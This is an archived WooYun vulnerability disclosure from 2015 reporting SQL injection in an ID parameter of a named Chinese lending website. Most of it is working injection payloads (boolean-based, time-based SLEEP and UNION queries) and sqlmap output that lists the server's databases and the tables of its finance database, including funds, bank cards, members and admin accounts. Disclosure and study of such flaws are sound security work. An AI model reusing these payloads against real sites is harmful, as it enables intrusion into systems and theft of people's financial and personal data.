乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-05-11: 细节已通知厂商并且等待厂商处理中 2015-05-13: 厂商已经确认,细节仅向厂商公开 2015-05-23: 细节向核心白帽子及相关领域专家公开 2015-06-02: 细节向普通白帽子公开 2015-06-12: 细节向实习白帽子公开 2015-06-27: 细节向公众公开
233
这个还是伪静态的参数http://www.caizhimofang.com/Home/Answer/answer/id/15payload:http://www.caizhimofang.com/Home/Answer/answer/id/15%20AND%203*2*1%3d6%20AND%20789%3d789http://www.caizhimofang.com/Home/Answer/answer/id/15%20AND%203*2*2%3d6%20AND%20789%3d789确认漏洞存在
---Parameter: #1* (URI) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: http://www.caizhimofang.com:80/Home/Answer/answer/id/15) AND 1717=1717 AND (8702=8702 Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: http://www.caizhimofang.com:80/Home/Answer/answer/id/15) AND (SELECT * FROM (SELECT(SLEEP(5)))NhZP) AND (1042=1042 Type: UNION query Title: Generic UNION query (NULL) - 6 columns Payload: http://www.caizhimofang.com:80/Home/Answer/answer/id/15) UNION ALL SELECT NULL,CONCAT(0x716a717a71,0x5958685a75757a77564c,0x7176627a71),NULL,NULL,NULL,NULL-- ---web application technology: Apache 2.4.9back-end DBMS: MySQL 5.0.12available databases [8]:[*] bak[*] bbs[*] bjdev[*] information_schema[*] mysql[*] newcfp[*] performance_schema[*] testDatabase: newcfp+----------------------+---------+| Table | Entries |+----------------------+---------+| cy_funds | 271870 || cy_redpackage | 180874 || cy_paydetail | 152530 || cy_lend | 146739 || cy_message | 131349 || cy_credit_log | 73933 || cy_member | 32455 || cy_custbase | 30857 || cy_account | 30856 || cy_funds_balance | 30850 || cy_phone_attribution | 29722 || cy_award_log | 13422 || cy_credit | 13289 || cy_authrecord | 13287 || cy_asset | 13286 || cy_family | 13286 || cy_workinfo | 13286 || cy_withdrayapply | 10486 || cy_bankcard | 9810 || cy_choujiang | 5361 || cy_shortmessage | 3819 || cy_sign | 2921 || cy_billno | 1722 || cy_award_user | 1674 || cy_contract_pic | 1236 || cy_borrow | 1062 || cy_mempoints_log | 673 || cy_personal_pic | 589 || cy_wx_drawmessage | 456 || cy_ent_pic | 435 || cy_reg | 386 || cy_city | 365 || cy_news | 358 || cy_auth_log | 293 || cy_estate_pic | 254 || cy_cardlist | 148 || cy_crights | 119 || cy_statistic_bid | 86 || cy_estate | 72 || cy_insurance | 48 || cy_fundtype | 36 || cy_auth_rule | 35 || cy_enterprice | 33 || cy_province | 31 || cy_activity_award | 29 || cy_answer | 23 || cy_question_tag | 22 || cy_bank | 20 || cy_question | 20 || cy_industry | 19 || cy_borrow_draft | 13 || cy_wx_users | 13 || cy_admin | 11 || cy_auth_group_access | 10 || cy_category | 10 || cy_borrowtype | 9 || cy_score_rule | 8 || cy_auth_group | 7 || cy_member_grade | 7 || cy_modules | 7 || cy_area | 6 || cy_tags | 5 || cy_union_account | 4 || cy_award | 2 || cy_email | 2 || cy_sms_user | 2 || cy_activity | 1 || cy_auth_group_user | 1 || cy_autobidstand | 1 || cy_enter_finareport | 1 |+----------------------+---------+
~~
危害等级:高
漏洞Rank:15
确认时间:2015-05-13 09:21
很感激
暂无